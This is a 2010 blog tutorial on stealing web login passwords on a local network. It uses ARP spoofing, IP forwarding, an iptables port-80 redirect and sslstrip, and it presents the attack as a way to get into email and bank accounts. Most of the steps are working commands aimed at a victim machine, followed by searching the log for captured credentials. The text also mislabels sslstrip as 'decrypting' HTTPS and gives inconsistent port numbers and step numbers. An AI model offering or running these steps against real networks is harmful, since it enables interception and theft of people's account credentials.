Monday, February 8, 2010

How to decrypt https passwords

Description

This tutorial shows how to hack or decrypt ssl (https) passwords, email accounts, bank accounts and other secure sites use ssl for encryption.
for example, i login to my gmail account, and in explore address bar it shows
https://mail.google.com/mail/?shva=1#

if you type paypal.com, it automatically redirects to https://www.paypal.com/mv
any sites which use https, we can decrypt password using ssl.

Before starting the attack.. follow the 2 steps below

1. download backtrack and burn to a dvd, and boot from dvd, and set the ip address

2. Attacking PC and Victim PC needs to be in same network/LAN. If Victim PC is on 192.168.1.0 range
then the attacking PC also needs to be in 192.168.1.0 range.

Steps to hack  email password using sslstrip program


Basically this attack consists of 4 steps.

Step1. Set the attacker machine in IP forwarding mode, so that it can forward all the victims packets to the right address.
#echo 1 > /proc/sys/net/ipv4/ip_forward

Step2. Start arp spoof attack between the victim machine and the gateway, we spoof the arp replies telling the victim machine that MAC address of the gateway is attackers MAC.
#arpspoof -i eth0 -t 192.168.50.5 192.168.50.1
-t is target (victim ip, 192.168.50.5)
192.168.50.1 is the gateway which you want to spoof

To check if arp is running successfully, from client machine ping to clients gateway, 192.168.50.1
and then use command arp -a
you should see attackers and gateway MAC should be same

The image you can see, gateway and attacker PC having same MAC address, 00-16-44-45-7e-c2, that means arp spoof attack is working.

Step3, Setup ip table rule using which will redirect all http traffic from victim pc to port 1000, which sslstrip is listening
open a new console, and type the following command.
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000


Step3, run sslstrip
#sslstrip -w secret

secret is file name that i want to save the results to a log file
from victim PC, open login to email
now use less secret command to read the log file
search for email address and password

if the log file is too long and if you want to search for a particular user id, use the following command
#less secret
#/infosec.tutorials

infosec.tutorials@gmail.com is the email address i used

Below image of gmail account infosec.tutorials@gmail.com, password field i have removed

No comments:

Post a Comment